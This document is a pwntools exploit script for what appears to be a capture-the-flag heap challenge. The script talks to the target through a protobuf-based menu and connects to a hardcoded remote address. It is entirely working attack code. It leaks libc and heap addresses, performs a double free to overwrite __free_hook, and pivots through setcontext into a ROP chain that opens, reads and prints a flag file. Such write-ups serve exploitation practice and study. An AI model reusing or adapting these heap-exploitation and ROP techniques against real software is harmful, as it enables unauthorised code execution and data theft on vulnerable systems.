from pwn import*
from ctf_pb2 import *
from ctypes import *
io = remote("123.57.248.214",16952)
elf = ELF("./pwn")
context.terminal = ['tmux','splitw','-h']
libc = ELF("./libc-2.31.so")
context.arch = "amd64"
context.log_level = "debug"
def debug():
gdb.attach(io)
pause()
def add(index,size,content):
global io
io.recvuntil("You can try to have friendly communication with me now: ")
chunk = pwn()
chunk.actionid = 2
chunk.msgidx = index*2
chunk.msgsize = size+0x10
chunk.msgcontent = content
io.send(chunk.SerializeToString())
def edit(index,size,content):
global io
io.recvuntil("You can try to have friendly communication with me now: ")
chunk = pwn()
chunk.actionid = 4
chunk.msgidx = index*2
chunk.msgsize = size+0x10
chunk.msgcontent = content
io.send(chunk.SerializeToString())
def show(index):
global io
io.recvuntil("You can try to have friendly communication with me now: ")
chunk = pwn()
chunk.actionid = 6
chunk.msgidx = index*2
chunk.msgsize = 0
chunk.msgcontent = b''
io.send(chunk.SerializeToString())
def delete(index):
global io
io.recvuntil("You can try to have friendly communication with me now: ")
chunk = pwn()
chunk.actionid = 8
chunk.msgidx = index*2
chunk.msgsize = 32
chunk.msgcontent = b'/bin/sh\x00'
io.send(chunk.SerializeToString())
for i in range(8):
add(i,0x100,b'/bin/sh\x00')
for i in range(7):
delete(i+1)
delete(0)
show(0)
libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x1ecbe0
success("libc_addr :"+hex(libc_addr))
for i in range(8,17):
add(i,0x60,b'/bin/sh\x00')
for i in range(10,17):
delete(i)
delete(8)
delete(9)
delete(8)
for i in range(17,24):
add(i,0x60,b'')
free_hook = libc_addr + libc.sym['__free_hook']
system_addr = libc_addr + libc.sym['system']
show(14)
io.recv()
heap_addr = u64(io.recv(6).ljust(8,b'\x00'))-0x11c0
success("heap_addr :"+hex(heap_addr))
gadget_addr = libc_addr + 0x0000000000151990
add(24,0x60,p64(free_hook))
add(25,0x60,p64(free_hook))
add(26,0x60,p64(free_hook))
add(27,0x60,p64(gadget_addr))
chunk_addr = heap_addr + 0x1db0-0xc0
setcontext_addr = libc_addr + libc.sym['setcontext']+61
rdi_addr = libc_addr + next(libc.search(asm("pop rdi;ret")))
rsi_addr = libc_addr + next(libc.search(asm("pop rsi;ret")))
open_addr = libc_addr + libc.sym['open']
rdx_addr = libc_addr + 0x0000000000119211
rsp_addr = libc_addr + next(libc.search(asm("pop rsp;ret")))
read_addr = libc_addr + libc.sym['read']
write_addr = libc_addr + libc.sym['write']
ret_addr = libc_addr + 0x0000000000022679
flag_addr = chunk_addr+0x10
payload = b'./flag\x00\x00'+p64(chunk_addr+0x10)+cyclic(0x10)+p64(setcontext_addr)
payload = payload.ljust(0xa0,b'\x00') + p64(chunk_addr+0x10+0xa8)+p64(ret_addr)
payload += p64(rdi_addr)+p64(0)+p64(rsi_addr)+p64(heap_addr+0x1df0)+p64(rdx_addr)+p64(0x200)+p64(0)+p64(read_addr)
add(28,0x1d0,payload)
delete(28)
payload = p64(rdi_addr) + p64(flag_addr) + p64(rsi_addr) + p64(0) + p64(open_addr)
payload += p64(rdi_addr) + p64(3) + p64(rsi_addr) + p64(flag_addr+0x100) + p64(rdx_addr) + p64(0x50) + p64(0) + p64(read_addr)
payload += p64(rdi_addr) + p64(1) + p64(rsi_addr) + p64(flag_addr+0x100) + p64(rdx_addr) + p64(0x50) + p64(0) + p64(write_addr)
io.send(payload)
flag = io.recvuntil("}")
print(flag)
|